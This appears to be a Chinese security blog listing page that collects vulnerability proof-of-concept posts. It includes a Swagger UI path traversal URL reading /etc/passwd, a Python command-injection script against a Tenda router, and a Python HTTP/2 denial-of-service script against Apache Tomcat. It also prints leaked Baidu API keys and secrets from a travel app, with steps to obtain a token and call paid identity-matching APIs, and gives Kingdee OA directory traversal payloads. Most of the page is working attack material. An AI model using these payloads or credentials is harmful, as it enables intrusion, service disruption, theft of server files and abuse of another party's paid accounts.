d0glun 发布的文章 - 瓜皮博客_d0glun

Swagger UI接口任意文件读取漏洞(CVE-2024-40348) pochttp://IP//api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)漏洞POCTenda FH1201 v1.2.0.14 存在命令注入漏洞，位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中，然后执行，因此攻击者可利用此漏洞执行任意命令固件下载网址：https://www.tendacn.com/download/detail-3322.htmlPOC import requests ip = '192.168.74.145' url = "http://" + ip + "/goform/WriteFacMac" payload = ";echo 'hacker!'" data = response = requests.post(url, data=data) print(response.text)

Apache Tomcat拒绝服务漏洞(CVE-2024-24549) import http.client # Configuration host = "target-server" # Change this to the target server address port = 443 # Change this to the target server port (usually 443 for HTTPS) num_requests = 1000 # Number of requests to send def send_dos_requests(): try: # Create an HTTP/2 connection conn = http.client.HTTPSConnection(host, port, timeout=10) headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Test-Header": "A" * 65536 # Large header value to exceed limits } for i in range(num_requests): conn.request("POST", "/", headers=headers) response = conn.getresponse() print(f"Request : Status Code: ") conn.close() except Exception as e: print(f"[-] An error occurred: ") if __name__ == "__main__": print(f"Sending HTTP/2 requests to :") send_dos_requests() Apache Tomcat 11.0.0-M1 至 11.0.0-M16 Apache Tomcat 10.1.0-M1 至 10.1.18 Apache Tomcat 9.0.0-M1 至 9.0.85 Apache Tomcat 8.5.0 至 8.5.98

同程旅行app存在敏感信息泄露 漏洞简述同程旅行app存在敏感信息泄露，攻击者可以通过反编译获得百度token，从而任意调用api付费服务复现步骤下载apphttps://www.wandoujia.com/apps/39733利用工具进行反编译此处泄露百度api<meta-data android:name="com.baidu.speech.APP_ID" android:value="11648787"/> <meta-data android:name="com.baidu.speech.API_KEY" android:value="yD9pMoFcLrra4sdy6KrtDRSs"/> <meta-data android:name="com.baidu.speech.SECRET_KEY" android:value="OrNd5wRs5KZXZUtyxXZWzyd7oS6fjROR"/>利用官方文档进行调用获取access_token https://openapi.baidu.com/oauth/2.0/token?grant_type=client_credentials&client_id=yD9pMoFcLrra4sdy6KrtDRSs&client_secret=OrNd5wRs5KZXZUtyxXZWzyd7oS6fjROR&scope=smartapp_snsapi_base 成功获取到accesstoken值，并且看到此处使用了大量的付费接口于是尝试调用付费接口，利用百度的在线工具https://cloud.baidu.com/apiexplorer/index.html?Product=GWSE-nmhroEsyriA&Api=GWAI-PZVqcHoyUhDheader处填入application/json access_token处填入上面获得的token，body处填入身份证号和对应的姓名，可以看到返回success，证明匹配成功当输入错误的姓名时显示不匹配，并且查询官方文档得知此api接口是付费接口，成功实现接管https://ai.baidu.com/ai-doc/FACE/ek8dz0tl6同样的 此接口也可调用，这里进行测试调用了自己的 https://cloud.baidu.com/apiexplorer/index.html?Product=GWSE-nmhroEsyriA&Api=GWAI-ropk3axeb3W修复方案隐藏敏感信息，并将key全部更换，避免存在已经泄露的潜在危害

金蝶OA server_file 目录遍历漏洞 漏洞描述金蝶OA server_file 存在目录遍历漏洞，攻击者通过目录遍历可以获取服务器敏感信息漏洞影响1金蝶OA网络测绘app="Kingdee-EAS"漏洞复现登录界面为漏洞Poc/appmonitor/protected/selector/server_file/files?folder=/&suffix= # Windows服务器 appmonitor/protected/selector/server_file/files?folder=C://&suffix= # Linux服务器 appmonitor/protected/selector/server_file/files?folder=/&suffix=